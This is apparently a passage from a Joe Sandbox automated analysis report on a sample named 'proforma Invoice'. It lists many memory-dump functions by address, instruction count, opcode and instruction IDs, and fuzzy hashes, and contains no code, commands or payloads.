                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                          • Instruction ID: 7400e11d4c607a151821150da49d2e2f0f099627d08a291138acbb650b2c2dad
                                                                          • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                          • Instruction Fuzzy Hash: 84319E31A00605EFDB19CF68C984F6ABBF9EF45354F1045A9E921CB291E730EE01CB51
                                                                          Function 011DE609 Relevance: .1, Instructions: 86COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e2b936d4ed2ea03f0d406bb629fc9b873ca701d5d311a4e0604e7e298160bc6b
                                                                          • Instruction ID: 1c904091ab3d2a4d15748f181a3354e5d4ccb490238025b00bde5e739f4a5350
                                                                          • Opcode Fuzzy Hash: e2b936d4ed2ea03f0d406bb629fc9b873ca701d5d311a4e0604e7e298160bc6b
                                                                          • Instruction Fuzzy Hash: 24318E75A01205EFCB18CF1CC8849AEBBB6FF88714F158459E8099B391E771EA51CB91
                                                                          Function 01168D59 Relevance: .1, Instructions: 83COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                          • Instruction ID: 4f43012ec1bcafb90d4d4359c20b42cd360f9a941d29cc78e6341e18dea5f872
                                                                          • Opcode Fuzzy Hash: 771e0484a404b195372877301509bf43f816fb0c262265de74eede4d8511304c
                                                                          • Instruction Fuzzy Hash: EA210631711681DBE72E976CC914B29B7F9AF60B54F0A00A8EE02877D2E77598408261
                                                                          Function 011E06F1 Relevance: .1, Instructions: 79COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42eade7138cdcf035a019d55c2dbe2cd92a3face71388ec06973d643ab4afe68
                                                                          • Instruction ID: 37895afe5095b74e683fdec2e55afa0cd7b8b92d472f842d65c7e4f71dbe3a9a
                                                                          • Opcode Fuzzy Hash: 42eade7138cdcf035a019d55c2dbe2cd92a3face71388ec06973d643ab4afe68
                                                                          • Instruction Fuzzy Hash: 8621A071E00A29ABCF18DF99C881ABEB7F4FF48744B540069F941A7240D778AD42CBA1
                                                                          Function 011E019F Relevance: .1, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2c35e8b931358fadd058a70f0a8c626d1211fb00ddafa99b7113e1301c2eb98c
                                                                          • Instruction ID: 358cdc35c6398c6c7dc1743c781f77aaff13eab85e8f0d868c665ac93897e137
                                                                          • Opcode Fuzzy Hash: 2c35e8b931358fadd058a70f0a8c626d1211fb00ddafa99b7113e1301c2eb98c
                                                                          • Instruction Fuzzy Hash: 3021AB71600A45AFD719DBA8D884B6AB7F8FF48744F140069F904DB790D774ED00CB64
                                                                          Function 011E0283 Relevance: .1, Instructions: 74COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3121d8499b91a3c8fded0486fe1c9a3f807e909bf263213560582706a861f103
                                                                          • Instruction ID: 49c98affbe8ce8093fc9beb0d88ff17f2b3fc3f7ceb7b4ca9a529e5ba8dc7c52
                                                                          • Opcode Fuzzy Hash: 3121d8499b91a3c8fded0486fe1c9a3f807e909bf263213560582706a861f103
                                                                          • Instruction Fuzzy Hash: D9212272A08B469FD319EF99C848B5BFBECEF94644F08446AFD90C7251D770D904C6A2
                                                                          Function 01182835 Relevance: .1, Instructions: 73COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bc1c4bbc9fa3912bbfc27eb7f079850804a07668921547d62a41ea74731b2f0e
                                                                          • Instruction ID: c4288e513c9c6c441f54646d885fc8b4071017f13be595ed4a4bee41a03e3211
                                                                          • Opcode Fuzzy Hash: bc1c4bbc9fa3912bbfc27eb7f079850804a07668921547d62a41ea74731b2f0e
                                                                          • Instruction Fuzzy Hash: 3021F9317156859BE72F676CDD44B283BD4AF42B74F190368FA209B6D2EB78C841C642
                                                                          Function 0119A30B Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5935e42133a98077ef67c522ed5dcbeccb7c61788dccdbd8b3affd344978bdc8
                                                                          • Instruction ID: 01ce9d262bbfd408befe628625652c35f6ad471b9c361d7a601a070d59c13bb5
                                                                          • Opcode Fuzzy Hash: 5935e42133a98077ef67c522ed5dcbeccb7c61788dccdbd8b3affd344978bdc8
                                                                          • Instruction Fuzzy Hash: 5121BB35210A019FCB29DF29CC40B56B7F5FF48B48F248469A519CBB61E331E946CF94
                                                                          Function 011E0946 Relevance: .1, Instructions: 70COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a6648b253f9442a36cc103b733ebeb2cea363cf96675e701e1ff2e5202971096
                                                                          • Instruction ID: bcd7ea085afa08e3d1739ce08d721adf8aa44919bc9b9660436db5a44722b210
                                                                          • Opcode Fuzzy Hash: a6648b253f9442a36cc103b733ebeb2cea363cf96675e701e1ff2e5202971096
                                                                          • Instruction Fuzzy Hash: B521FAB1E00309ABCB14DFAAE9859AEFBF9FF98710F10012FE409A7244D7709981CB54
                                                                          Function 011F80A8 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction ID: fbf82667c9b77ce65bdc45a39162980629dc735907601b6a968407de5b39098d
                                                                          • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                                          • Instruction Fuzzy Hash: FD218E72A00209EFDF169F98CC40BAEBBB9EF89310F214819FA10A7251D734D951DB50
                                                                          Function 01190124 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction ID: e40eebedfa19f47a9de04ef9dadfd79073171ceaad75d91f7b6b5b28c17d3ab5
                                                                          • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                                          • Instruction Fuzzy Hash: FD11E2B2A00615AFEB2A9B44CC41F9ABBBCEF94B58F100429F6108B180D771ED44CB54
                                                                          Function 01168770 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9a5d6848efc200b217d121a2863a955f04f54ef0074e9a224b2faa10296f4fa8
                                                                          • Instruction ID: 40f862d9880f778115eeefb81d8f5abbe46ca0c5861ac5c4d56b6f5a2cb16ed9
                                                                          • Opcode Fuzzy Hash: 9a5d6848efc200b217d121a2863a955f04f54ef0074e9a224b2faa10296f4fa8
                                                                          • Instruction Fuzzy Hash: 5311C132700B119BDB19CF8EC4C0A26BBEDAF4A750B19806DEE089F204D7B3D921C790
                                                                          Function 0119AAEE Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction ID: e023a953ce5b9996cf92fea9e144acd7a4eda23709f01e9401aa005447bca677
                                                                          • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                                          • Instruction Fuzzy Hash: 2C218B72600641DFDB39DF49E540A66FBE6EF94B14F15883DE99A87A10C730EC05CB80
                                                                          Function 011680E9 Relevance: .1, Instructions: 66COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3b16087ade84796b8f58bafa2a817a27d58057050a9a8190e9863933c94cdb5e
                                                                          • Instruction ID: c4c1281942fbb555c540c795f8b559d796cfbd01d546a95350d4a3190c76edb5
                                                                          • Opcode Fuzzy Hash: 3b16087ade84796b8f58bafa2a817a27d58057050a9a8190e9863933c94cdb5e
                                                                          • Instruction Fuzzy Hash: 79216F75A00205DFCB18CF58C581A6EBBB9FB88318F25416DD105A7311DB72AD16CBD0
                                                                          Function 0119674D Relevance: .1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 666e0dc969178685db8e88068584657dc4413886287aaea015aad0b91e79745e
                                                                          • Instruction ID: be6b196509c1a35b6a2e6eea1615520971e4fe90830a66fbad61fc5e3dc3d6e4
                                                                          • Opcode Fuzzy Hash: 666e0dc969178685db8e88068584657dc4413886287aaea015aad0b91e79745e
                                                                          • Instruction Fuzzy Hash: B0218E75510B00EFDB288F68C880B6AB7F8FF44250F40882DE5AAC7650EB30A840CB61
                                                                          Function 011F6870 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 25e4254fb3e966aca035fcc6e2b3928677f11429b44f1287737a3b429f9da247
                                                                          • Instruction ID: c6d8c905f596e021e10d4d384b753574a1a896d33f960ea3ab8e628af04d0fa2
                                                                          • Opcode Fuzzy Hash: 25e4254fb3e966aca035fcc6e2b3928677f11429b44f1287737a3b429f9da247
                                                                          • Instruction Fuzzy Hash: 51119132240614FFD72ADB69CD40F9A77A8FB95B54F11402DF7059B251EB70E901C790
                                                                          Function 0118E8C0 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6a2673f46a463738d13c76f8e53810258fe863c079832b5d33142d73647ea17b
                                                                          • Instruction ID: e3e31655997608b6379ec7025f8da5013e85161bb7746e0abbb6687f96aec061
                                                                          • Opcode Fuzzy Hash: 6a2673f46a463738d13c76f8e53810258fe863c079832b5d33142d73647ea17b
                                                                          • Instruction Fuzzy Hash: 7F1144337001119BCB1DDB28CC80A2B7667EBD1674B258529E9228B380EB309802C691
                                                                          Function 011966B0 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 36d3bf7ff9a243d0797cf99584ffac5ad9bfa540829c2253126dbb375a007392
                                                                          • Instruction ID: 16f1ca01048b5129606b86b443963bc959d3de19cc7e67458c70cd21afb24ede
                                                                          • Opcode Fuzzy Hash: 36d3bf7ff9a243d0797cf99584ffac5ad9bfa540829c2253126dbb375a007392
                                                                          • Instruction Fuzzy Hash: 6D11B876A01605EBCF2DCF99D580E5ABBF9EB84610B06807AE9259B310E730DD00CBA0
                                                                          Function 0122A8E4 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction ID: 2d68e466a0888a94095a109e8077bf660843e0560824c78cae60a8b242ac3d55
                                                                          • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                          • Instruction Fuzzy Hash: 1F110436A1092ABFDB19CB58CC05BADBBF5FF84210F058269E85597740E671ED41CB80
                                                                          Function 01160AD0 Relevance: .1, Instructions: 61COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction ID: 83246bf74a41741a5b1e14370644df9983735800956457223f5166123b4c00c6
                                                                          • Opcode Fuzzy Hash: 975f93ae0bdd36ad56dc7d48bb40b3373a7fecd11d003270eb178f636a7ee754
                                                                          • Instruction Fuzzy Hash: C62106B5A40B059FD3A0CF29C540B52BBF4FB48B10F10892EE98AC7B40E371E854CB90
                                                                          Function 011EE7E1 Relevance: .1, Instructions: 59COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction ID: 379c30e4fa5230baba05534a2efbccb97b6c966150d1f022d61944f10b47e14a
                                                                          • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                          • Instruction Fuzzy Hash: 5511C631602E05EFE7299FC8C848F56BBE6EF55754F058428E9499B150EB31DC44DB90
                                                                          Function 011827ED Relevance: .1, Instructions: 58COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 10237edb40573141fcc3f9576388940423756a0f1d690605fb6c3e9037b5cd21
                                                                          • Instruction ID: 66fd9de8b31ed7c28f3fde43520406a1ed0d29c56f2e5a519510faedce4754c7
                                                                          • Opcode Fuzzy Hash: 10237edb40573141fcc3f9576388940423756a0f1d690605fb6c3e9037b5cd21
                                                                          • Instruction Fuzzy Hash: AC012B717156496FE71FA26DE844F2B7BDCEF52794F054068F90087241E724DC00C2A2
                                                                          Function 01164690 Relevance: .1, Instructions: 57COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 33e98bed4c374b8d6b7a067052e538008c9bcd145e62bc97cb6f45b3be843d99
                                                                          • Instruction ID: 2f2a847390dc60b37d493c57901b0ee8be3e7fe9f662b599184d45fa4f7c4d21
                                                                          • Opcode Fuzzy Hash: 33e98bed4c374b8d6b7a067052e538008c9bcd145e62bc97cb6f45b3be843d99
                                                                          • Instruction Fuzzy Hash: 62112576200B41AFDB2DCF59D880F567BADEB85B65F044119F9048BA40C33AEC60CF60
                                                                          Function 01196620 Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2907a95558097f8d0d4b411ecf612f75428e5be652a1caa03e77db4b7a63aa0e
                                                                          • Instruction ID: 6955f67bb66bbc374eb32d4e51d9717a53296ea58770a915b69c0f3d22e3fe65
                                                                          • Opcode Fuzzy Hash: 2907a95558097f8d0d4b411ecf612f75428e5be652a1caa03e77db4b7a63aa0e
                                                                          • Instruction Fuzzy Hash: 6511A172A00715ABEF25DF69C9C0B5EFBB9FF84754F500459DA11A7200D735AE01CBA0
                                                                          Function 0118EA2E Relevance: .1, Instructions: 56COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6c1db72397d0ed2997e2783d8e37017baa4c544916a48d7f26cf60216768531b
                                                                          • Instruction ID: 7bd43737e27ff7b73b1b4366afbb05e3fd920e34aa5ef4bb1e5110dff973144e
                                                                          • Opcode Fuzzy Hash: 6c1db72397d0ed2997e2783d8e37017baa4c544916a48d7f26cf60216768531b
                                                                          • Instruction Fuzzy Hash: 8001B575502209AFD729EF19E488F26BBF9FF85718F24816AE1058B260D770EC42CF90
                                                                          Function 0118E53E Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction ID: 4a8465fc58b0cda7fb696d1c21cb208c7b70317c30fe32fff0a9245ac6bd438b
                                                                          • Opcode Fuzzy Hash: 3cef38ccb94af525019048e13b43edf7cf1492b2ee9bf366ac8f969377c4ca22
                                                                          • Instruction Fuzzy Hash: 4B114C312066C39BE72F971CC844B697BE4FB11B58F1A00A4EE0187742F328C843C622
                                                                          Function 011EE75D Relevance: .1, Instructions: 54COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction ID: 42f792091d3394b1135c084fe81ce28637444a74598b047a1d2df349b4a1e68b
                                                                          • Opcode Fuzzy Hash: 9e027ce95eb4732775abeceb8693466c215af0eeeb981fbb7873360829093128
                                                                          • Instruction Fuzzy Hash: 0D014932A42D05AFE72D5F98CC08F567BE9EF45754F058424EA048B260E772DD50CBD0
                                                                          Function 0115A250 Relevance: .1, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction ID: e94c3b499b4b0a332f9c3107829d8eee6d177ecbaf88afbb40e42f47dae561c3
                                                                          • Opcode Fuzzy Hash: 3c789e6569c780a36f7740ae573b44e677a8d28900b05b280d318a59104278c5
                                                                          • Instruction Fuzzy Hash: C5012631444721EFCB798F59F841A32BBB5EF557A07008A2DFCA58B281D731D400CB60
                                                                          Function 011DE1D0 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c76a8b67661f673c03ef87fa6a09fa63154933915d0f1f717149f288d97ad2e6
                                                                          • Instruction ID: 6b4c9c5d463007b59554cd6fd1e55900007675f91e6c9c907375ffa0dd25e4c4
                                                                          • Opcode Fuzzy Hash: c76a8b67661f673c03ef87fa6a09fa63154933915d0f1f717149f288d97ad2e6
                                                                          • Instruction Fuzzy Hash: 0E11AD36242241EFDB19EF19CD90F16BBB8FF54B88F2000A9FA059B661D335ED01CA90
                                                                          Function 01166259 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2ed33a064b542f8c19c4b943caa8c58eb75b5a4a40c50cbd96c0ceb36e4e0283
                                                                          • Instruction ID: 1969d6680af0971a20a20a6f348af5d0c928c6208a3e7fe9711026c8314da68d
                                                                          • Opcode Fuzzy Hash: 2ed33a064b542f8c19c4b943caa8c58eb75b5a4a40c50cbd96c0ceb36e4e0283
                                                                          • Instruction Fuzzy Hash: B2115E74541229ABDB29AB64CD41FE9B778BB04714F9041D4A314A61E0D7709E91CF85
                                                                          Function 01196DA0 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                          • Instruction ID: 2f9563f722a538641e5d0e9239538710b623464882a89091fc7fc37939cf8290
                                                                          • Opcode Fuzzy Hash: c0ec4d266471c9547166acc1fd1eb763428ac71706b94ce862d4cb5f0fc29682
                                                                          • Instruction Fuzzy Hash: 99014C71604125A7EF2DDB15C804BDF7FA4EB40B50F064055BA165B280D774D880C3F1
                                                                          Function 011E6050 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 05922580bd0f1d40bc07909731a18cec6af89eafc8b3549e94bcd924d6bc2f86
                                                                          • Instruction ID: ab50081c63ac7d6b2b85dceeaa71127d2f5b7c37353c0562a745e3f687f3859d
                                                                          • Opcode Fuzzy Hash: 05922580bd0f1d40bc07909731a18cec6af89eafc8b3549e94bcd924d6bc2f86
